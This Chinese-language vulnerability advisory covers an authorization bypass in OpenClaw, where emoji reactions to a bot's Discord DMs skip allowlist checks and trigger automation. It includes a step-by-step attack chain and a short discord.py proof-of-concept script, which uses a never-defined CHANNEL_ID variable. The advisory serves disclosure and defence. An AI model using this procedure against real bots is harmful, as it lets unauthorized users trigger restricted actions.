CVE-2026-32028 CVSS 5.3 中危

CVE-2026-32028 OpenClaw授权绕过漏洞

披露日期: 2026-03-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32028

漏洞类型

访问控制缺失

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.2.25之前的版本中存在安全漏洞，系统未能正确执行针对Discord直接消息（DM）反应通知的dmPolicy和allowFrom授权检查。该漏洞允许非白名单用户通过简单的交互操作绕过DM授权限制。攻击者只需对机器人发送的DM消息进行表情反应，即可将反应衍生的系统事件加入队列，从而触发下游的自动化流程或特定的工具策略，导致未经授权的操作被执行。

技术细节

该漏洞源于OpenClaw在处理Discord事件流时的逻辑缺陷。当用户对机器人发送的Direct Message (DM) 进行Reaction（表情反应）时，系统会生成一个内部事件。在受影响版本中，验证模块未正确调用`dmPolicy`和`allowFrom`安全检查机制来验证该Reaction来源用户的合法性。正常情况下，这类操作应仅限于预设的信任用户或管理员。由于校验缺失，任何接收到DM的用户均可利用此机制。攻击者无需任何认证（PR:N）或用户交互（UI:N），即可通过网络（AV:N）发起攻击。尽管该漏洞未导致数据泄露（C:N），但它破坏了系统的完整性（I:L），允许攻击者滥用自动化工具，执行非预期的操作。

攻击链分析

STEP 1

1. 初始交互

攻击者与OpenClaw机器人进行交互，导致机器人向攻击者发送一条Direct Message (DM)。

STEP 2

2. 识别目标

攻击者确定机器人发送的消息ID，该消息包含可供反应的表情符号区域。

STEP 3

3. 触发漏洞

攻击者对该DM消息添加一个表情符号（Reaction）。由于系统未执行dmPolicy和allowFrom检查，该操作被系统接收。

STEP 4

4. 事件入队

OpenClaw系统将此反应视为合法的输入信号，生成相应的系统事件并将其加入处理队列。

STEP 5

5. 执行未授权操作

下游的自动化工具或策略被触发，导致攻击者（非白名单用户）成功执行了本应受限的操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# This is a conceptual Proof of Concept (PoC) demonstrating the trigger mechanism.
# Exploitation requires interaction with the OpenClaw Discord bot.

import discord

# Configuration
TARGET_BOT_ID = 123456789012345678  # Replace with actual OpenClaw Bot ID
MESSAGE_ID = 987654321098765432    # The ID of the DM message sent by the bot
TOKEN = 'ATTACKER_USER_TOKEN'      # Attacker's Discord token

intents = discord.Intents.default()
client = discord.Client(intents=intents)

@client.event
async def on_ready():
    print(f'Logged in as {client.user}')
    try:
        # Fetch the specific channel (DM) or use the channel object directly
        # In a real scenario, the attacker finds the DM channel ID
        channel = client.get_channel(CHANNEL_ID) 
        
        if channel:
            # Fetch the message sent by the bot
            message = await channel.fetch_message(MESSAGE_ID)
            
            # Trigger the vulnerability by adding a reaction
            # This bypasses dmPolicy/allowFrom checks in vulnerable versions
            await message.add_reaction('✅')
            print(f'[+] Reaction added to message {MESSAGE_ID}. Event queued.')
        else:
            print('[-] Channel not found.')
    except Exception as e:
        print(f'[-] Error: {e}')
    await client.close()

# Note: Actual exploitation relies on the victim bot accepting the reaction
# and processing it without verifying the sender against the allowlist.
# client.run(TOKEN) 

影响范围

OpenClaw < 2026.2.25

防御指南

临时缓解措施

建议用户暂时禁用OpenClaw机器人的Direct Message (DM)接收功能，或者在防火墙/网关层面监控异常的自动化触发请求，直到完成版本升级。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表